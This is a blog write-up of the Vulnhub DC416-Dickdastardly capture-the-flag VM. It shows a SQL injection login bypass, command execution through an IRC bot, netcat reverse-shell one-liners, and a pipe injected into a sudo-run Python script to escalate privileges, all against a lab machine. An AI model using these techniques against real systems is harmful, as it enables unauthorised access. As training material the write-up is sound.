[Vulnhub] DC416-Dickdastardly

Hey everyone we got another Vulnhub VM from the DC416 Series.

lets start by doing a portscan, allright so we can see ports 22, 80,are open and port 6667 is filtered and the port 6667 is an IRC server, so lets try to connect to it with an IRC client. to see if we can determine the version of the server.

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
6667/tcp filtered irc
MAC Address: 00:0C:29:3C:F5:B9 (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

hmm i couldnt connect to the IRC server, so lets leave that for now, i fire up dirbuster, to scan for hidden directories and files, and we find some really interesting files.

dirbuster-dastardly
Lets check out the headers by using the command

curl -v 192.168.1.14
* Rebuilt URL to: 192.168.1.14/
* Trying 192.168.1.14...
* Connected to 192.168.1.14 (192.168.1.14) port 80 (#0)
> GET / HTTP/1.1
> Host: 192.168.1.14
> User-Agent: curl/7.50.1
> Accept: */*
>
< HTTP/1.1 200 OK
< Date: Mon, 19 Dec 2016 18:08:24 GMT
< Server: Apache/2.4.7 (Ubuntu)
< Last-Modified: Mon, 17 Oct 2016 16:04:49 GMT
< ETag: "1eb-53f11bc50cf74"
< Accept-Ranges: bytes
< Content-Length: 491
< Vary: Accept-Encoding
< Flag: flag1{l0l_h0w_345y_15_7h15_c7f}
< Content-Type: text/html

so as we can see there was a header named Flag, which contained the flag.

first Flag: flag1{l0l_h0w_345y_15_7h15_c7f}

Now lets visit the admin.php page, as we can see this looks like a Guestbook, but on the right side we see an admin panel, so lets try some basic SQL injection bypasses to login as admin.

admin-login ‘=’ user field
‘=’ password field

this allowed us to be logged in as the admin

admin-bypassed.png

now i can also see why we couldnt login to the IRC, since our ip needed to be whitelisted first, so that explains the issue why we couldnt connect at first. So lets try to whitelist our ip, and then reconnect to the irc server.

irc-whitelist

So after whitelisting our ip now we can connect to the IRC server, now lets try to add the Supybot, and create a user and password for it, after joining #vulnhub channel. we can see the bot is named vulnhub bot.

after typing help it will show us.

(help [] []) -- This command gives a useful description of what  does. is only necessary if the command is in more than one plugin. You may also want to use the 'list' command to list all available plugins and commands.

so we type !list

Admin, AutoMode, Channel, Config, Misc, NickAuth, Owner, Unix, User, and Utilities

Hmm Unix seems interesting to me.

type !list Unix

call, crypt, errno, fortune, pid, ping, ping6, progstats, shell, spell, sysuname, sysuptime, and wtf

when i typed !shell ls it said :

root: I don’t recognize you. You can message me either of these two commands: “user identify ” to log in or “user register ” to register.

!user identify admin test
-vulnhub-bot- The operation succeeded.

nice, now lets see if we can execute the ls command

!shell ls
-vulnhub-bot- backup, conf, data, flag2, logs, plugins, tmp, vulnhub-bot.conf, vulnhub-bot.conf.bak, and web

yep! this worked like a charm, so we can already see the flag sitting there, but i want a shell 🙂

now setup a netcat listener in your terminal type, nc -lvp 4444

type this in the bot’s chat window

!shell nc -e /bin/sh 192.168.1.15 4444

bot-nc

and we got a reverse shell now if we type ls we have the flag there, just cat it

shell1

cat flag2
flag2{y0u’r3_4_5upyb07_n00b_m8}

now lets go for the last flag, first we check if the current user has any permission to execute sudo commands, we do this by using sudo -l

sudol

so it appears we can execute a python program with the user permissions of vulnhub, lets see what it does.

sudo -u vulnhub /usr/bin/python /usr/local/sbin/util.py

commands

ahh nice, there is a coffee command, i need that right now since i’ve been already hacking all day, and its quite late here.

coffee

ahh nice thats better, now lets get back on getting the last flag lol, whoami prints out the current permissions of this program, nice its a step higher up then we have so if we get a shell with this program, then we have escalated our privileges to the user vulnhub.

So after some trial & error on the List Directory command, i managed to get code execution by using | so we setup another netcat listener nc -lvp 4445

Enter dir to list: | nc -e /bin/bash 192.168.1.15 4445
| nc -e /bin/bash 192.168.1.15 4445
ls: write error: Broken pipe

we get the broken pipe but we still manage to get a shell

shell2
Great! now we are vulnhub, from here we can go to /home/vulnhub/
ls and here it is the last flag!

flag3{n3x7_71m3_54n17153_y0ur_1npu7}

flag3end

Thanks for reading my write up as always
Thanks to : @Vulnhub  and @RastaMouse
for creating this vm.

Advertisements

2 thoughts on “[Vulnhub] DC416-Dickdastardly

  1. Don’t forget that there is a flag0. If you check out processes running as root, you will find the following:
    ping -c 1 -b 192.168.110.255 -p 5f6d6f72655f796f755f6172655f6162 2
    The pattern is obviously a set of hex encoded characters. Since ping is sending the pattern to the broadcast address, all you need to do is fire up wireshark and piece together a few packets:
    flag0{the_quieter_you_become_the_more_you_are_able_to_hear}

    Like

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s